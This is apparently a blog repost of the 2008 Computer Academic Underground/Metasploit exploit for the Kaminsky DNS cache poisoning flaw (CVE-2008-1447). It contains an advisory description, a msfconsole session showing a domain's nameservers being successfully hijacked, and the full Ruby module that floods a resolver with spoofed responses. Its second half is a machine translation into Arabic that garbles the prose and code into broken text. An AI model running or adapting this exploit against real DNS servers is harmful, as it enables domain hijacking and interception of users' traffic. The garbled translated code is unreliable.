TIGblogs - sami

code de lattaque sur le dns (= faille dns) en juillet 2008

_ __
/ / | | | |
----====####/ /__##/ / ##| |##| |####====----
| | | |__| | | | | |
| | ___ | __ | | | | |
------======###### / /#| |##| |#| |##| |######======------
____/ |__| |__| ______/

Computer Academic Underground
http://www.caughq.org
Exploit Code

===============/==================================- ======================
Exploit ID: CAU-EX-2008-0003
Release Date: 2008.07.23
Title: bailiwicked_domain.rb
Description: Kaminsky DNS Cache Poisoning Flaw Exploit for Domains
Tested: BIND 9.4.1-9.4.2
Attributes: Remote, Poison, Resolver, Metasploit
Exploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0003.tx- t
Author/Email: I)ruid
H D Moore
===============/==================================- ======================

Description
===========

This exploit targets a fairly ubiquitous flaw in DNS implementations
which allow the insertion of malicious DNS records into the cache of the
target nameserver. This exploit caches a single malicious nameserver
entry into the target nameserver which replaces the legitimate
nameservers for the target domain. By causing the target nameserver to
query for random hostnames at the target domain, the attacker can spoof
a response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing target nameserver to insert the additional record into the
cache. This insertion completely replaces the original nameserver
records for the target domain.

Example
=======

# /msf3/msfconsole

## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##

=[ msf v3.2-release
+ -- --=[ 298 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 73 aux

msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_domain) > set DOMAIN example.com
DOMAIN => example.com
msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com
NEWDNS => dns01.metasploit.com
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > check
[*] Using the Metasploit service to verify exploitability...
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] FAIL: This server uses static source ports and is vulnerable to poisoning
msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D
[*] exec: dig +short -t ns example.com @A.B.C.D

b.iana-servers.net.
a.iana-servers.net.

msf auxiliary(bailiwicked_domain) > run
[*] Switching to target port 50391 based on Metasploit service
[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com
[*] Querying recon nameserver for example.com.'s nameservers...
[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net.
[*] Querying recon nameserver for address of b.iana-servers.net....
[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236
[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com....
[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net.
[*] Querying recon nameserver for address of a.iana-servers.net....
[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43
[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com....
[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...
[*] Sent 1000 queries and 20000 spoofed responses...
[*] Sent 2000 queries and 40000 spoofed responses...
[*] Sent 3000 queries and 60000 spoofed responses...
[*] Sent 4000 queries and 80000 spoofed responses...
[*] Sent 5000 queries and 100000 spoofed responses...
[*] Sent 6000 queries and 120000 spoofed responses...
[*] Sent 7000 queries and 140000 spoofed responses...
[*] Sent 8000 queries and 160000 spoofed responses...
[*] Sent 9000 queries and 180000 spoofed responses...
[*] Sent 10000 queries and 200000 spoofed responses...
[*] Sent 11000 queries and 220000 spoofed responses...
[*] Sent 12000 queries and 240000 spoofed responses...
[*] Sent 13000 queries and 260000 spoofed responses...
[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com
[*] Auxiliary module execution completed

msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D
[*] exec: dig +short -t ns example.com @A.B.C.D

dns01.metasploit.com.

Credits
=======

Dan Kaminsky is credited with originally discovering this vulnerability.

Cedric Blancher figured out the NS injection method and
was cool enough to email us and share!

References
==========

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-- 2008-1447
http://www.kb.cert.org/vuls/id/800113

Metasploit
==========

require 'msf/core'
require 'net/dns'
require 'scruby'
require 'resolv'

module Msf

class Auxiliary::Spoof:ns::BailiWickedDomain < Msf::Auxiliary

include Exploit::Remote::Ip

def initialize(info = {})
super(update_info(info,
'Name' => 'DNS BailiWicked Domain Attack',
'Description' => %q{
This exploit attacks a fairly ubiquitous flaw in DNS implementations which
Dan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target
domains nameserver entries in a vulnerable DNS cache server. This attack works
by sending random hostname queries to the target DNS server coupled with spoofed
replies to those queries from the authoritative nameservers for that domain.
Eventually, a guessed ID will match, the spoofed packet will get accepted, and
the nameserver entries for the target domain will be replaced by the server
specified in the NEWDNS option of this exploit.
},
'Author' =>
[
' I)ruid', 'hdm',
#
'Cedric Blancher ' # Cedric figured out the NS injection method
# and was cool enough to email us and share!
#
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 5591 $',
'References' =>
[
[ 'CVE', '2008-1447' ],
[ 'US-CERT-VU', '8000113' ],
[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0003.t- xt' ],
],
'DisclosureDate' => 'Jul 21 2008'
))

register_options(
[
OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),
OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']),
OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]),
OptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']),
OptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]),
OptInt.new('TTL', [true, 'TTL for the malicious NS entry', 31337]),
], self.class)

end

def auxiliary_commands
return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable" }
end

def cmd_check(*args)
targ = args[0] || rhost()
if(not (targ and targ.length > 0))
print_status("usage: check [dns-server]"
return
end

print_status("Using the Metasploit service to verify exploitability..."
srv_sock = Rex::Socket.create_udp(
'PeerHost' => targ,
'PeerPort' => 53
)

random = false
ports = []
lport = nil

1.upto(5) do |i|

req = Resolv:NS::Message.new
txt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000- ).to_i}.red.metasploit.com"
req.add_question(txt, Resolv:NS::Resource::IN::TXT)
req.rd = 1

srv_sock.put(req.encode)
res, addr = srv_sock.recvfrom()

if res and res.length > 0
res = Resolv:NS::Message.decode(res)
res.each_answer do |name, ttl, data|
if (name.to_s == txt and data.strings.join('') =~ /^([^s]+)s+.*red.metasploit.com/m)
t_addr, t_port = $1.split(':')

print_status(" >> ADDRESS: #{t_addr} PORT: #{t_port}"
t_port = t_port.to_i
if(lport and lport != t_port)
random = true
end
lport = t_port
ports << t_port
end
end
end
end

srv_sock.close

if(ports.length < 5)
print_status("UNKNOWN: This server did not reply to our vulnerability check requests"
return
end

if(random)
print_status("PASS: This server does not use a static source port. Ports:#{ports.join(", "}"
print_status(" This server may still be exploitable, but not by this tool."
else
print_status("FAIL: This server uses static source ports and is vulnerable to poisoning"
end
end

def run
target = rhost()
source = Rex::Socket.source_address(target)
sport = datastore['SRCPORT']
domain = datastore['DOMAIN'] + '.'
newdns = datastore['NEWDNS']
recons = datastore['RECONS']
xids = datastore['XIDS'].to_i
newttl = datastore['TTL'].to_i
xidbase = rand(20001) + 20000

address = Rex::Text.rand_text(4).unpack("C4".join("."

srv_sock = Rex::Socket.create_udp(
'PeerHost' => target,
'PeerPort' => 53
)

# Get the source port via the metasploit service if it's not set
if sport.to_i == 0
req = Resolv:NS::Message.new
txt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red- .metasploit.com"
req.add_question(txt, Resolv:NS::Resource::IN::TXT)
req.rd = 1

srv_sock.put(req.encode)
res, addr = srv_sock.recvfrom()

if res and res.length > 0
res = Resolv:NS::Message.decode(res)
res.each_answer do |name, ttl, data|
if (name.to_s == txt and data.strings.join('') =~ /^([^s]+)s+.*red.metasploit.com/m)
t_addr, t_port = $1.split(':')
sport = t_port.to_i

print_status("Switching to target port #{sport} based on Metasploit service"
if target != t_addr
print_status("Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!"
end
end
end
end
end

# Verify its not already poisoned
begin
query = Resolv:NS::Message.new
query.add_question(domain, Resolv:NS::Resource::IN::NS)
query.rd = 0

begin
cached = false
srv_sock.put(query.encode)
answer, addr = srv_sock.recvfrom()

if answer and answer.length > 0
answer = Resolv:NS::Message.decode(answer)
answer.each_answer do |name, ttl, data|

if((name.to_s + "." == domain and data.name.to_s == newdns)
t = Time.now + ttl
print_status("Failure: This domain is already using #{newdns} as a nameserver"
print_status(" Cache entry expires on #{t.to_s}"
srv_sock.close
disconnect_ip
return
end
end

end
end until not cached
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_status("Error checking the DNS name: #{e.class} #{e} #{e.backtrace}"
end

res0 = Net:NS::Resolver.new(:nameservers => [recons], ns_search => false, :recursive => true) # reconnaissance resolver

print_status "Targeting nameserver #{target} for injection of #{domain} nameservers as #{newdns}"

# Look up the nameservers for the domain
print_status "Querying recon nameserver for #{domain}'s nameservers..."
answer0 = res0.send(domain, Net:NS::NS)
#print_status " Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities"

barbs = [] # storage for nameservers
answer0.answer.each do |rr0|
print_status " Got an #{rr0.type} record: #{rr0.inspect}"
if rr0.type == 'NS'
print_status " Querying recon nameserver for address of #{rr0.nsdname}..."
answer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname
#print_status " Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities"
answer1.answer.each do |rr1|
print_status " Got an #{rr1.type} record: #{rr1.inspect}"
res2 = Net:NS::Resolver.new(:nameservers => rr1.address, ns_search => false, :recursive => false, :retry => 1)
print_status " Checking Authoritativeness: Querying #{rr1.address} for #{domain}..."
answer2 = res2.send(domain)
if answer2 and answer2.header.auth? and answer2.header.anCount >= 1
nsrec = {:name => rr0.nsdname, :addr => rr1.address}
barbs << nsrec
print_status " #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as"
end
end
end
end

if barbs.length == 0
print_status( "No DNS servers found."
srv_sock.close
disconnect_ip
return
end

# Flood the target with queries and spoofed responses, one will eventually hit
queries = 0
responses = 0

connect_ip if not ip_sock

print_status( "Attempting to inject poison records for #{domain}'s nameservers into #{target}:#{sport}..."

while true
randhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname

# Send spoofed query
req = Resolv:NS::Message.new
req.id = rand(2**16)
req.add_question(randhost, Resolv:NS::Resource::IN::A)

req.rd = 1

buff = (
Scruby::IP.new(
#:src => barbs[0][:addr].to_s,
:src => source,
st => target,
roto => 17
)/Scruby::UDP.new(
:sport => (rand((2**16)-1024)+1024).to_i,
port => 53
)/req.encode
).to_net
ip_sock.sendto(buff, target)
queries += 1

# Send evil spoofed answer from ALL nameservers (barbs[*][:addr])
req.add_answer(randhost, newttl, Resolv:NS::Resource::IN::A.new(address))
req.add_authority(domain, newttl, Resolv:NS::Resource::IN::NS.new(Resolv:NS::Name.create(newdns)))
req.add_additional(newdns, newttl, Resolv:NS::Resource::IN::A.new(address)) # Ignored
req.qr = 1
req.aa = 1

xidbase.upto(xidbase+xids-1) do |id|
req.id = id
barbs.each do |barb|
buff = (
Scruby::IP.new(
#:src => barbs[:addr].to_s,
:src => barb[:addr].to_s,
st => target,
roto => 17
)/Scruby::UDP.new(
:sport => 53,
port => sport.to_i
)/req.encode
).to_net
ip_sock.sendto(buff, target)
responses += 1
end
end

# status update
if queries % 1000 == 0
print_status("Sent #{queries} queries and #{responses} spoofed responses..."
end

# every so often, check and see if the target is poisoned...
if queries % 250 == 0
begin
query = Resolv:NS::Message.new
query.add_question(domain, Resolv:NS::Resource::IN::NS)
query.rd = 0

srv_sock.put(query.encode)
answer, addr = srv_sock.recvfrom()

if answer and answer.length > 0
answer = Resolv:NS::Message.decode(answer)
answer.each_answer do |name, ttl, data|
if((name.to_s + "." == domain and data.name.to_s == newdns)
print_status("Poisoning successful after #{queries} attempts: #{domain} == #{newdns}"
srv_sock.close
disconnect_ip
return
end
end
end
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_status("Error querying the DNS name: #{e.class} #{e} #{e.backtrace}"
end
end

end

end

end
end

[دن] عيبة يوليو-تمّوز 2008 هجوم رمز
Automatically translated into Arabic thanks to WorldLingo
[كد] [د] [لتّقو] [سور] [ل] [دنس] (=[فيلّ] [دن]) [إن] [جويلّت] 2008

_ __
// | | | |
----====####//__ ##//##| |##| |####====----
| | | |__| | | | | |
| | ___ | _ _ | | | | |
------======######//#| |##| |#| |##| |######======------
____/ |__| |__| ______/

حاسوب أكاديميّة باطنيّة
http://www.caughq.org
مأثرة رمز

===============/==================================- ======================
مأثرة [إيد]: [كو-إكس-2008-0003]
إطلاق تاريخ: 2008.07.23
عنوان: [بيليويكددومين.رب]
وصف: [كمينسكي] [دن] مخبأ تسمم عيبة مأثرة لمجالات
يختبر: رباط 9.4.1-9.4.2
شعارات: جهاز تحكّم عن بعد, سم, [رسلفر], [متسبلويت]
مأثرة [أورل]: http://www.caughq.org/exploits/CAU-EX-2008-0003.tx- [ت]
مؤلفة/بريد إلكترونيّ: [إي]) [رويد] يستهدف [درويد] (@) caughq.org>
[ه] [د] مور [هدم] (@) metasploit.com>
===============/==================================- ======================

وصف
===========

هذا مأثرة عيبة كلّيّ وجود تماما في [دن] تزويدات
أيّ يسمح الإدخال من خبيثة [دن] سجلات داخل المخبأ من
الهدف [نمسرفر]. يخبّئ هذا مأثرة وحيد خبيثة [نمسرفر]
مدخل داخل الهدف [نمسرفر] أيّ يستبدل ال [نمسرفرس] شرعيّة
للهدف مجال. ب يسبّب الهدف [نمسرفر] أن
يتساءل ل [هوستنم] عشوائيّة في الهدف مجال, المهاجمة علبة خدعة
إستجابة إلى الهدف نادلة بما في ذلك جوابة للسؤال,
سلطة نادلة سجل, وسجل إضافيّة ل أنّ نادلة,
يسبّب هدف [نمسرفر] أن يدخل السجل إضافيّة داخل
المخبأ. يستبدل هذا إدخال تماما الأصليّة [نمسرفر]
سجلات للهدف مجال.

مثال
=======

# /msf3/msfconsole

## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##

=[[مسف] [ف3.2-رلس]
+ -- --=[298 مآثر - 124 حمولات
+ -- --=[18 مرمزات - 6 [نوبس]
=[73 [مسف] [أوإكس]

>إستعمال ثبت مساعدة/خدعة/[دن]/[بيليويكددومين]
[مسف] مساعدة ([بيليويكددومين])>[رهوست] [أ.ب.ك.د]
[رهوست] => [أ.ب.ك.د]
[مسف] مساعدة ([بيليويكددومين])>ثبت مجال example.com
مجال => example.com
[مسف] مساعدة ([بيليويكددومين])>ثبت [نودنس] dns01.metasploit.com
[نودنس] => dns01.metasploit.com
[مسف] مساعدة ([بيليويكددومين])>ثبت [سركبورت] 0
[سركبورت] => 0
[مسف] مساعدة ([بيليويكددومين])>تدقيق
[*] يستعمل [متسبلويت] خدمة أن يدقّق [إإكسبلويتبيليتي]…
[*]>>عنوان: [أ.ب.ك.د] مينة: 50391
[*]>>عنوان: [أ.ب.ك.د] مينة: 50391
[*]>>عنوان: [أ.ب.ك.د] مينة: 50391
[*]>>عنوان: [أ.ب.ك.د] مينة: 50391
[*]>>عنوان: [أ.ب.ك.د] مينة: 50391
[*] [فيل]: يستعمل هذا نادلة ساكن إستاتيكي مصدر مين وحصينة إلى تسمم
[مسف] مساعدة ([بيليويكددومين])>لطم [شورت] - [ت] [نس] example.com [أ.ب.ك.د]
[*] [إإكسك]: لطم [شورت] - [ت] [نس] example.com [أ.ب.ك.د]

b.iana-servers.net.
a.iana-servers.net.

[مسف] يركض
مساعدة ([بيليويكددومين])>[*] تحويل أن يستهدف مينة 50391 يؤسّس على [متسبلويت] خدمة
[*] يستهدف [نمسرفر] [أ.ب.ك.د] لحقنة example.com. [نمسرفرس] ك dns01.metasploit.com
[*] يتساءل [نمسرفر] [ركن] ل example.com. '[س] [نمسرفرس]…
حصل [*] [نس] سجل: example.com. 171957 في [نس] b.iana-servers.net.
[*] يتساءل [نمسرفر] [ركن] لعنوان b.iana-servers.net….
حصل [*] [ا] سجل: b.iana-servers.net. 171028 في [ا] 193.0.0.236
[*] يفحص [أوثوريتتيفنسّ]: يتساءل 193.0.0.236 ل example.com….
[*] b.iana-servers.net. رسميّة ل example.com. , يضيف إلى قائمة ميلان إلى جانب ال [نمسرفرس] إلى خدعة بما أنّ
[*] يحصل [نس] سجل: example.com. 171957 في [نس] a.iana-servers.net.
[*] يتساءل [نمسرفر] [ركن] لعنوان a.iana-servers.net….
حصل [*] [ا] سجل: a.iana-servers.net. 171414 في [ا] 192.0.34.43
[*] يفحص [أوثوريتتيفنسّ]: يتساءل 192.0.34.43 ل example.com….
[*] a.iana-servers.net. رسميّة ل example.com. , يضيف إلى قائمة ميلان إلى جانب ال [نمسرفرس] إلى خدعة بما أنّ
[*] يحاول أن يحقن سم سجلات ل example.com. '[س] [نمسرفرس] داخل [أ.ب.ك.د]: 50391…
خدع [*] يرسل 1000 أسئلة و20000 إستجابات…
خدع [*] يرسل 2000 أسئلة و40000 إستجابات…
خدع [*] يرسل 3000 أسئلة و60000 إستجابات…
خدع [*] يرسل 4000 أسئلة و80000 إستجابات…
خدع [*] يرسل 5000 أسئلة و100000 إستجابات…
خدع [*] يرسل 6000 أسئلة و120000 إستجابات…
خدع [*] يرسل 7000 أسئلة و140000 إستجابات…
خدع [*] يرسل 8000 أسئلة و160000 إستجابات…
خدع [*] يرسل 9000 أسئلة و180000 إستجابات…
خدع [*] يرسل 10000 أسئلة و200000 إستجابات…
خدع [*] يرسل 11000 أسئلة و220000 إستجابات…
خدع [*] يرسل 12000 أسئلة و240000 إستجابات…
خدع [*] يرسل 13000 أسئلة و260000 إستجابات…
[*] يسمّم ناجحة بعد 13250 محاولات: example.com. == dns01.metasploit.com
[*] مساعدة وحدة نمطيّة أتمّ

تنفيذ [مسف] مساعدة ([بيليويكددومين])>لطم [شورت] - [ت] [نس] example.com [أ.ب.ك.د]
[*] [إإكسك]: لطم [شورت] - [ت] [نس] example.com [أ.ب.ك.د]

dns01.metasploit.com.

[كرديتس]
منحت =======

[دن] [كمينسكي] مع أصلا يكتشف هذا جروحية.

[سدريك] مبيضة حسب [سد] (@) rstack.org>خارجا ال [نس] حقنة طريقة
وكان باردة بكفاية إلى بريد إلكترونيّ نا وسهم!

يتطلّب مراجع
==========

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-- 2008-1447
http://www.kb.cert.org/vuls/id/800113

[متسبلويت]
==========

يتطلّب "[مسف]/لب"
"شبكة/[دن]"
يتطلّب "[سكروبي]"
يتطلّب "[رسلف]"

وحدة نمطيّة [مسف]

صنف مساعدة:: [سبووف]: [نس]:: [بيليويكدّومين]<[مسف]:: مساعدة

يتضمّن مأثرة:: جهاز تحكّم عن بعد:: [إيب]

يقع [دف] ([إينفو]={})
فائقة ([أوبدتينفو] ([إينفو],
"اسم" => "[دن] [بيليويكد] مجال هجوم",
"وصف" => [ق] {
هذا مأثرة يهاجم عيبة كلّيّ وجود تماما في [دن] تزويدات أيّ
[دن] [كمينسكي] أسّس وكشف [جول] 2008. يستبدل هذا مأثرة الهدف
مجالات [نمسرفر] مداخل في حصينة [دن] مخبأ نادلة. يعمل
هذا هجوم ب يرسل عشوائيّة [هوستنم] أسئلة إلى الهدف [دن] نادلة يزوّج مع خدع
جوابات إلى أنّ أسئلة من ال [نمسرفرس] رسميّة ل أنّ مجال.
أخيرا, تلاءم يخمّن [إيد], ال خدع ربط سيحصل يقبل,
وال [نمسرفر] مداخل للهدف مجال كنت سيستبدلون بالنادلة
يعيّن في ال [نودنس] خيار من هذا مأثرة.
},
"حسب مؤلفة" =>
[
"أنا) [رويد]", "[هدم]",
#
"[سدريك] مبيضة [سد] [في] [رستك.ورغ]" # [سدريك] خارجا ال [نس] حقنة طريقة
# وكان باردة بكفاية إلى بريد إلكترونيّ نا وسهم!
#
],
"رخصة" => [مسفليسنس],
"صيغة" => '[$رفيسون]: 5591 $ ',
"مراجع" =>
[
["[كف]", "2008-1447"],
["[أوس-سرت-فو]", "8000113"],
["[أورل]", "http://www.caughq.org/exploits/CAU-EX-2008-0003.t- [إكست]"],
],
"[ديسكلوسوردت]" => "يوليو-تمّوز 21 2008"
))

عدّلت [رجستروبأيشنس] (
[
[أبتبورت.نو] ("[سركبورت]", [يصحّ, "الهدف نادلة مصدر سؤال مينة (0 لآليّة)", [نيل]]),
[أبتسترينغ.نو] ("مجال", [يصحّ, "المجال إلى إختطاف", "[إإكسمبل.كم]"]),
[أبتسترينغ.نو] ("[نودنس]", [يصحّ, "ال [هوستنم] من الإستبدال [دن] نادلة", [نيل]]),
[أبتدّرسّ.نو] ("[ركنس]", [يصحّ, "[نمسرفر] يستعمل لاستكشاف", "208.67.222.222"]),
[أبتينت.نو] ("[إكسيدس]", [, "رقم من [إكسيدس] أن يحاول ل كلّ سؤال", 10]),
[أبتينت.نو] ("[تّل]", [يصحّ, "[تّل] للخبيثة [نس] مدخل", 31337]),
], [سلف.كلسّ])

نهاية

[دف] [أوإكسيليركمّندس]
عودة {"تدقيق" يحدّ => "إن ال يعيّن [دن] نادلة ([رهوست]) يكون حصينة"}
نهاية

[دف] [كمدشك] ([أرغس])
[ترغ]=[أرغس] [0] || [رهوست] ()
إن (لا ([ترغ] و [ترغ.لنغث]>0))
[برينتستتثس] ("إستعمال: تدقيق [[دنس-سرفر]] "
عائدة
نهاية

[برينتستتثس] ("يستعمل [متسبلويت] خدمة أن يدقّق [إإكسبلويتبيليتي]…"
[سرفسك]=[رإكس]:: [سكت.كرتودب] (
"[بيرهوست]" => [ترغ],
"[بيربورت]" => 53
)

عشوائيّة=يتمّ مين زائفة
=[]
[لبورت]=[نيل]

[1.وبتو] (5) |[إي]|

[رق]=[رسلف]: [نس]:: [مسّج.نو]
[سبووفبروب-شك-] [تإكست]="{أنا} - # {$$} # {(بطانة () *1000000-) [.توي]} [.رد.متسبلويت.كم]"
[رق.دّقوسأيشن] ([تإكست], [رسلف]: [نس]:: موردة:: في:: [تإكست])
[رق.رد]=1

[سرفسك.بوت] ([رق.نكد])
[رس], [أدّر]=[سرفسك.ركففروم] ()

إن [رس] و [رس.لنغث]>0
[رس]=[رسلف]: [نس]:: يتمّ [مسّج.دكد] ([رس])
[رس.شنسور] |اسم, [تّل], معطيات|
إن ([نم.توس] == [تإكست] و [دت.سترينغس.جوين] ('') =~/^ ([[س]]+) [س.] red.metasploit.com/m)
[تدّر], [تبورت]=[$1.سبليت] (": ")

[برينتستتثس] (">>عنوان: # {[تدّر]} مينة: # {[تبورت]} "
[تبورت]=[تبورت.توي]
إن ([لبورت] و [لبورت]! =[تبورت])
عشوائيّة=يصحّ
نهاية
[بورتس] [لبورت]=[تبورت]
<<[تبورت]
نهاية
نهاية
نهاية
نهاية

[سرفسك.كلوس]

إن ([بورتس.لنغث]<5)
[برينتستتثس] ("مجهولة: لم يجب هذا نادلة إلى نا جروحية تدقيق طلبات "
نهاية

عائدة
إن (عشوائيّة)
[برينتستتثس] ("ممر: لا يستعمل هذا نادلة ساكن إستاتيكي مصدر مينة. مين: # {[بورتس.جوين] (","} "
[برينتستتثس] ("هذا نادلة يمكن بعد كنت ممكن استغلال, غير أنّ لا ب هذا أداة. "
[برينتستتثس] أخرى
("[فيل]: يستعمل هذا نادلة ساكن إستاتيكي مصدر مين وحصينة إلى تسمم "
نهاية
نهاية

[دف] شوط
هدف=[رهوست] ()
مصدر=[رإكس]:: [سكت.سورسدّرسّ] (هدف)
رياضة=[دتستور] ["[سركبورت]"]
مجال=[دتستور] ["مجال"]+". "
[نودنس]=[دتستور] ["[نودنس]"]
[ركنس]=[دتستور] ["[ركنس]"]
[إكسيدس]=[دتستور] ["[إكسيدس]"] [.توي]
[نوتّل]=[دتستور] ["[تّل]"] [.توي]
[إكسيدبس]=بطانة (20001)+20000

عنوان=[رإكس]:: [تإكست.رندتإكست] (4) [.ونبك] ("[ك4]" [.جوين] (". "

[سرفسك]=[رإكس]:: يحصل [سكت.كرتودب] (
"[بيرهوست]" => هدف,
"[بيربورت]" => 53
)

# المصدر مينة عن طريق ال [متسبلويت] خدمة إن هو يكون لا يثبت
إن [سبورت.توي] == 0
[رق]=[رسلف]: [نس]:: [مسّج.نو]
[تإكست]="[سبووفبروب-] {$$} # {(بطانة () *1000000) [.توي]} [.رد-] .metasploit.com"
[رق.دّقوسأيشن] ([تإكست], [رسلف]: [نس]:: موردة:: في:: [تإكست])
[رق.رد]=1

[سرفسك.بوت] ([رق.نكد])
[رس], [أدّر]=[سرفسك.ركففروم] ()

إن [رس] و [رس.لنغث]>0
[رس]=[رسلف]: [نس]:: يتمّ [مسّج.دكد] ([رس])
[رس.شنسور] |اسم, [تّل], معطيات|
إن ([نم.توس] == [تإكست] و [دت.سترينغس.جوين] ('') =~/^ ([[س]]+) [س.] red.metasploit.com/m)
[تدّر], [تبورت]=[$1.سبليت] (": ")
رياضة=[تبورت.توي]

[برينتستتثس] ("يحوّل إلى هدف مينة # {رياضة} يؤسّس على [متسبلويت] خدمة"
إن هدف! =[تدّر]
[برينتستتثس] ("يحذّر: هدف ليس عنوان # {هدف} ال نفس مثلما ال [نمسرفر] سؤال مصدر عنوان # {[تدّر]}! "
نهاية
نهاية
نهاية
نهاية
يدقّق نهاية

# ه لا سابقا يسمّم
بدأت
سؤال=[رسلف]: [نس]:: [مسّج.نو]
[قور.دّقوسأيشن] (مجال, [رسلف]: [نس]:: موردة:: في:: يبدأ
[نس])
[قور.رد]=0

يخبّئ=زائفة
[سرفسك.بوت] ([قور.نكد])
جوابة, [أدّر]=[سرفسك.ركففروم] ()

إن جوابة و [أنسور.لنغث]>0
جوابة=[رسلف]: [نس]:: يتمّ [مسّج.دكد] (جوابة)
[أنسور.شنسور] |اسم, [تّل], معطيات|

إن (([نم.توس]+"." == مجال و [دت.نم.توس] == [نودنس])
[ت]=[تيم.نوو]+[تّل]
[برينتستتثس] ("إخفاق: يستعمل هذا مجال سابقا # {[نودنس]} بما أنّ [نمسرفر] "
[برينتستتثس] ("مخبأ مدخل يمضي على # {[ت.توس]}"
[سرفسك.كلوس]
[ديسكنّكتيب]
عودة
نهاية
نهاية

نهاية
نهاية إلى أن لا يخبّأ
إنقاذ:: توقف
إرتفاع $!
إنقاذ:: استثناء => [إ]
[برينتستتثس] ("خطأ يفحص ال [دن] اسم: # {[إ.كلسّ]} # {[إ]} # {[إ.بكترس]} "
نهاية

[رس0]=شبكة: [نس]:: [رسلفر.نو] (: [نمسرفرس] => [[ركنس]], [نسسرش] => زائفة: => متواترة يصحّ) # استكشاف [رسلفر]

[برينتستتثس] "يستهدف [نمسرفر] # {هدف} لحقنة من # {مجال} [نمسرفرس] بما أنّ # {[نودنس]}"

# ينظر فوق ال [نمسرفرس] للمجال
[برينتستتثس] "يتساءل [نمسرفر] [ركن] ل # {مجال} '[س] [نمسرفرس]…"
[أنسور0]=[رس0.سند] (مجال, شبكة: [نس]:: [نس])
[برينتستتثس] "يتمّ يحصل جوابة مع # {[أنسور0.هدر.نكونت]} جوابات, # {[أنسور0.هدر.نسكونت]} سلطات"

شوكات=[] # تخزين ل [نمسرفرس]
[أنسور0.نسور.ش] |[رّ0]|
حصل [برينتستتثس] "# {[رّ0.تب]} سجل: يتمّ # {[رّ0.ينسبكت]} "
إن [رّ0.تب] == "[نس]"
[برينتستتثس] "يتساءل [نمسرفر] [ركن] لعنوان ال # {[رّ0.نسدنم]}…"
[أنسور1]=[رس0.سند] ([رّ0.نسدنم]) # يحصل ال [نس] جوابة ل ال [هوستنم]
[برينتستتثس] "يحصل جوابة مع # {[أنسور1.هدر.نكونت]} جوابات, # {[أنسور1.هدر.نسكونت]} سلطات"
[أنسور1.نسور.ش] |[رّ1]|
حصل [برينتستتثس] "# {[رّ1.تب]} سجل: # {[رّ1.ينسبكت]} "
[رس2]=شبكة: [نس]:: [رسلفر.نو] (: [نمسرفرس] => [رّ1.دّرسّ], [نسسرش] => زائفة: => متواترة زائفة: إعادة تجريب => 1)
[برينتستتثس] "يفحص [أوثوريتتيفنسّ]: يتساءل # {[رّ1.دّرسّ]} ل # {مجال}… "
[أنسور2]=[رس2.سند] (مجال)
إن [أنسور2] و [أنسور2.هدر.وث]? و [أنسور2.هدر.نكونت] >= 1
[نسرك]={: => عظيمة [رّ0.نسدنم]: [أدّر] => [رّ1.دّرسّ]}
شوكات<<[نسرك]
[برينتستتثس] "# {[رّ0.نسدنم]} رسميّة ل # {مجال}, يضيف إلى قائمة ميلان إلى جانب ال [نمسرفرس] إلى خدعة بما أنّ"
نهاية
نهاية
نهاية
نهاية

إن [بربس.لنغث] == 0
[برينتستتثس] ("ما من [دن] نادلات يؤسّس. "
[سرفسك.كلوس]
[ديسكنّكتيب]
عودة
نهاية

